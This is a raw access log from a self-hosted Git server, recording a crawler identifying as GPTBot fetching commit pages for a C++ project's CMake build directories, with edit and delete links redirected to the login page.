git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:16:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:16:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10045] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:16:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:16:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:16:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:16:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 33986] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:16:38:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:38:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9950] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9955] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9950] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9949] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9951] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9951] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9949] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9954] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10116] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9926] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10117] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10111] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10115] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10653] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 